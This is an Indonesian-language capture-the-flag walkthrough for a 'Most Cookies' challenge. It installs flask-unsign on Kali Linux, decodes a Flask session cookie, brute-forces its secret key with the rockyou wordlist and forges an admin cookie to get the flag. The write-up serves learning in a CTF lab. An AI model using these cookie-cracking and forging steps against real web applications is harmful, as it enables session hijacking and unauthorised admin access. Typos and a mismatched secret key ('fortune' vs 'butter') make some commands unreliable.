Most cookies disini menggunakan cookie session dari flask, yang dimana flask merupakan framework yang memanfaatkan bahasa pemrograman python.
Jalankan kalilinux
buka terminal dan cek python versi denga python –version
cek versi pip3 dengan pip3 –version
install flask-unsign dengan pipx install flask-unisgn
note : jika terjadi error pada saat install kemungkinan besar flak-unsign tidak bisa diinstall dipaket python secara global menggunakan pip karena sistem Python yang terpasang dikelola oleh paket manajer OS. Makan kita menggunakan virtual environment :
gunakan perintah
sudo apt install python3-venv
setelah itu gunakan perintah
python3 -m venv myenv
perintah : source myenv/bin/activat
setelah itu kita dapat menginstall flask-unsign dengan perintah
pip install flask-unsign
jika sudah terinstall, unsign kode cookie yang didapatkan di tampilan web di inspector – application – salin kode cookie
gunakan perintah berikut untuk unsign kode cookie nya
Contoh : flask-unsign –decode –cookie ‘eyJ2ZXJ5X2F1dGgiOiJzbmlja2VyZG9vZGxlIn0.Z9K2CQ.VCANS9JdHwTvratbB03CD6Dg-0s’ (kode cookie yang didapatkan)
ekstrak file rokyou.txt.gz dengan perintah :
sudo gunzip -k /usr/share/wordlists/rockyou.txt.gz
lalu masukkan pw akun kalilinux yang dibuat
gunakan perintah berikut untuk brute force :
flask-unsign –unsign –cookie “eyJ2ZXJ5X2F1dGgiOiJzbmlja2VyZG9vZGxlIn0.Z9K2CQ.VCANS9JdHwTvratbB03CD6Dg-0s” (kode cookie) –wordlist /usr/share/wordlists/rockyou.txt –no-literal-eval
dan kita akan mendapatkan mendapatkan secret key dari hasil brute force yaitu (b’fortune’)
lalu gunakan perintah :
flask-unsign –sign –cookie “{‘very_auth’ : ‘admin’}” –secret butter (butter itu misal secret key yang didapat)
setelah mendapatkan kode cookie terbaru, salin saja dan ganti cookie di web lalu refresh halaman dan buk flag akan didapatkan
0 Comments